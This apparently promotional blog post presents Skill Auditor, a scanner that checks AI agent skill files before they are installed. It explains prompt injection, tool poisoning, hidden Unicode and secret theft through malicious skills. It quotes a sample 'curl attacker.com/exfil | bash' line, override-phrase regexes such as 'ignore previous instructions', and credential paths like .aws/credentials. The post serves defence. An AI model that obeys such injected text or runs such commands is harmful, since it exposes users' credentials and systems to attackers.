The MCP Supply Chain Problem Nobody Is Talking About
MCP marketplaces make installing AI agent tools effortless. But every skill runs with your agent's full permissions. One malicious SKILL.md can exfiltrate your credentials, inject prompts, or open a reverse shell. Here is how Skill Auditor solves this.
The npm Moment for AI Agents
Remember the early days of npm? Developers installed packages freely because the ecosystem was small and trust was implicit. Then came event-stream. Then ua-parser-js. Then colors and faker. The JavaScript ecosystem learned the hard way that an open package registry without security scanning is a supply-chain attack waiting to happen.
AI agent skills are following the exact same trajectory -- but faster, and with higher stakes.
MCP (Model Context Protocol) marketplaces, OpenClaw skill registries, and community-shared SKILL.md files make it trivially easy to extend your agent with new capabilities. Need a GitHub integration? Install a skill. Need database access? Install a skill. Need web scraping? Install a skill.
Every one of those skills runs with your agent's full permissions. Your agent can read files, access environment variables, call APIs, and execute code. When you install a skill, you are granting that skill the same access.
What a Malicious Skill Looks Like
A well-crafted malicious skill does not look malicious. It looks like a helpful tool with clean documentation and a professional README. The attack surface is broad:
Prompt Injection. The skill description contains hidden instructions that override the agent's system prompt. The agent begins following the attacker's instructions instead of the user's. This requires no code execution -- just carefully worded text in a markdown file.
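A pattern-based detector for this class of attack can be sketched in a few lines. The patterns and the `detectInjection` function below are illustrative assumptions, not Skill Auditor's actual rule set:

```typescript
// Illustrative prompt-injection patterns -- a real scanner would use a
// larger, tuned rule set (Skill Auditor's uses 11 patterns).
const INJECTION_PATTERNS: RegExp[] = [
  /ignore (all )?(previous|prior) instructions/i, // instruction hijacking
  /you are (now|no longer)/i,                     // identity override
  /disregard (your|the) system prompt/i,          // system prompt override
  /<\/?(system|assistant)>/i,                     // delimiter manipulation
];

interface Finding {
  line: number;
  pattern: string;
}

// Scan a skill file's text and report which pattern matched on which line.
function detectInjection(skillText: string): Finding[] {
  const findings: Finding[] = [];
  skillText.split("\n").forEach((line, i) => {
    for (const pattern of INJECTION_PATTERNS) {
      if (pattern.test(line)) {
        findings.push({ line: i + 1, pattern: pattern.source });
      }
    }
  });
  return findings;
}
```

Note that this runs on the markdown itself, before any code executes -- which is exactly why content-layer scanning catches what runtime tools cannot.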
Tool Poisoning. The skill embeds shell commands in its tool definitions. When the agent invokes the tool, it executes `curl attacker.com/exfil | bash` alongside the legitimate operation. The user sees the expected output. The attacker receives the environment variables.
Hidden Unicode. Zero-width characters and right-to-left overrides hide malicious instructions from human review. The skill file looks clean in a text editor but contains invisible directives that the LLM processes faithfully.
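Detecting these characters is mechanical once you know the code points. The character class below covers zero-width characters and bidirectional controls; the function name and output shape are assumptions for illustration:

```typescript
// Zero-width chars (U+200B..U+200D, U+2060, U+FEFF) plus bidi controls
// (U+202A..U+202E embeddings/overrides, U+2066..U+2069 isolates).
const HIDDEN_CHARS = /[\u200B-\u200D\u2060\uFEFF\u202A-\u202E\u2066-\u2069]/g;

// Report every invisible character with its line number and code point,
// so a reviewer can see exactly where the file is not what it appears.
function findHiddenUnicode(text: string): { line: number; codePoint: string }[] {
  const findings: { line: number; codePoint: string }[] = [];
  text.split("\n").forEach((line, i) => {
    for (const match of line.matchAll(HIDDEN_CHARS)) {
      findings.push({
        line: i + 1,
        codePoint:
          "U+" + match[0].codePointAt(0)!.toString(16).toUpperCase().padStart(4, "0"),
      });
    }
  });
  return findings;
}
```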
Encoded Payloads. Base64-encoded strings that decode to `eval()` or `subprocess.run()` calls. The skill description says "helper utility." The encoded payload says "reverse shell."
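The decode-then-scan step can be sketched as follows. The length threshold and the dangerous-call patterns are illustrative choices, not the tool's real heuristics:

```typescript
// Runs of 24+ Base64-alphabet characters are worth decoding; shorter runs
// produce too many false positives on ordinary identifiers.
const BASE64_RUN = /[A-Za-z0-9+/]{24,}={0,2}/g;
const DANGEROUS = /\b(eval|exec|subprocess\.run|child_process)\b/;

// Decode each Base64-looking run and flag decoded text that contains
// code-execution calls the plain file never mentions.
function flagEncodedPayloads(text: string): string[] {
  const flagged: string[] = [];
  for (const match of text.matchAll(BASE64_RUN)) {
    const decoded = Buffer.from(match[0], "base64").toString("utf8");
    if (DANGEROUS.test(decoded)) flagged.push(decoded);
  }
  return flagged;
}
```

The point is that the scanner judges the *decoded* content, so an attacker cannot hide `subprocess.run` behind an innocent-looking encoded string.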
Secret Exfiltration. The skill references `.env`, `.ssh/`, `.aws/credentials`, or `~/.config/` paths. It reads credentials and sends them to an external endpoint disguised as a legitimate API call.
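A first-pass check for this is a simple substring scan over the sensitive paths named above. The path list mirrors the examples in this section; the function itself is a hypothetical sketch:

```typescript
// Credential locations a skill has no ordinary reason to reference.
const SENSITIVE_PATHS = [".env", ".ssh/", ".aws/credentials", ".config/"];

// Return every sensitive path the skill text mentions.
function findSensitivePathRefs(text: string): string[] {
  return SENSITIVE_PATHS.filter((p) => text.includes(p));
}
```

A mention alone is not proof of exfiltration, which is why findings like this feed a risk score rather than a hard block.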
Why Existing Security Tools Miss This
Traditional security tools were not designed for this threat model. Antivirus scans executables, not markdown files. WAFs inspect HTTP requests, not LLM prompts. SIEM rules correlate log events, not skill file contents.
The attack happens before any code runs. It happens at the content layer -- in the text that shapes the agent's behavior. By the time a traditional security tool could detect the malicious activity, the agent has already been compromised.
The Skill Auditor Approach: 7 Layers, Pre-Install
Panguard Skill Auditor runs before the skill is installed. It inspects the skill file and returns a quantitative risk score (0-100) with specific findings at exact line numbers.
The 7 check layers run in parallel:
- **Manifest Validation** -- Verifies SKILL.md structure, required fields, and metadata consistency
- **Prompt Injection Detection** -- 11 regex patterns covering identity override, instruction hijacking, jailbreak attempts, and delimiter manipulation
- **Hidden Unicode Detection** -- Scans for zero-width characters, RTL overrides, and homoglyph attacks that hide malicious content from human review
- **Encoded Payload Detection** -- Automatically decodes Base64 and flags eval/exec/subprocess patterns in decoded content
- **Tool Poisoning Detection** -- Identifies reverse shells, privilege escalation commands, RCE payloads, and environment variable exfiltration
- **SAST and Secret Scanning** -- Static analysis for hardcoded API keys, passwords, and tokens
- **Permission Scope Analysis** -- Evaluates whether requested permissions match the skill's stated purpose
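Because the layers are independent, running them concurrently is straightforward. A minimal sketch, assuming a `CheckLayer` interface and stub layer that are illustrative rather than the tool's real API:

```typescript
interface LayerResult {
  layer: string;
  findings: string[];
}

type CheckLayer = (skillText: string) => Promise<LayerResult>;

// Promise.all starts every layer at once; no layer blocks the others.
async function runLayers(
  skillText: string,
  layers: CheckLayer[]
): Promise<LayerResult[]> {
  return Promise.all(layers.map((layer) => layer(skillText)));
}

// Hypothetical stub layer: flag a SKILL.md with no frontmatter block.
const manifestValidation: CheckLayer = async (text) => ({
  layer: "manifest-validation",
  findings: text.startsWith("---") ? [] : ["missing frontmatter"],
});
```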
Quantitative Scoring, Not Binary Verdicts
Most security tools give you a binary answer: safe or unsafe. Skill Auditor gives you a number and the evidence behind it.
| Score  | Level    | Action                 |
|--------|----------|------------------------|
| 0-14   | LOW      | Safe to install        |
| 15-39  | MEDIUM   | Review findings first  |
| 40-69  | HIGH     | Manual review required |
| 70-100 | CRITICAL | Do NOT install         |
A score of 35 with a single medium-severity finding for a broad regex match is very different from a score of 92 with four critical findings including a Base64-encoded reverse shell. The number tells you how much attention the skill needs. The findings tell you exactly where to look.
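The thresholds in the table translate directly into a mapping function. The thresholds below come from the table; the function itself is an illustrative sketch:

```typescript
type RiskLevel = "LOW" | "MEDIUM" | "HIGH" | "CRITICAL";

// Map a 0-100 risk score to its level per the table above.
function riskLevel(score: number): RiskLevel {
  if (score >= 70) return "CRITICAL";
  if (score >= 40) return "HIGH";
  if (score >= 15) return "MEDIUM";
  return "LOW";
}
```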
Three Lines of Code to Block Malicious Skills
```typescript
import { auditSkill } from '@panguard-ai/panguard-skill-auditor';

const report = await auditSkill(skillPath);
if (report.riskLevel === 'CRITICAL' || report.riskLevel === 'HIGH') {
  throw new Error(`Blocked: ${skillPath} scored ${report.riskScore}/100`);
}
```

This is the pre-install gate. Three lines of logic that prevent every HIGH and CRITICAL skill from reaching your agent. Integrate it into your CI/CD pipeline, your agent framework's skill loader, or your MCP server's tool registration flow.
The Bigger Picture: Publisher Is Not Auditor
Open ecosystems need independent security. The entity that publishes a skill should not be the only entity that evaluates its safety. npm learned this and built npm audit. PyPI learned this and integrated safety checks. The AI agent ecosystem has no equivalent -- yet.
Panguard Skill Auditor is that independent third party. It does not publish skills. It does not host a marketplace. It evaluates safety. That separation of concerns is fundamental to trustworthy open ecosystems.
When Skill Auditor finds a threat, it can optionally report the pattern to Threat Cloud -- anonymized, stripped of all PII, encrypted in transit. If three independent users confirm the same pattern, and Claude Sonnet review approves it, the pattern becomes a new ATR detection rule distributed to every user globally.
One developer catches a malicious skill. Every developer is protected from it.
Get Started
```bash
npm install @panguard-ai/panguard-skill-auditor
```

No account. No API key. No configuration. Works on macOS, Linux, and Windows. Scan your first skill in under 30 seconds.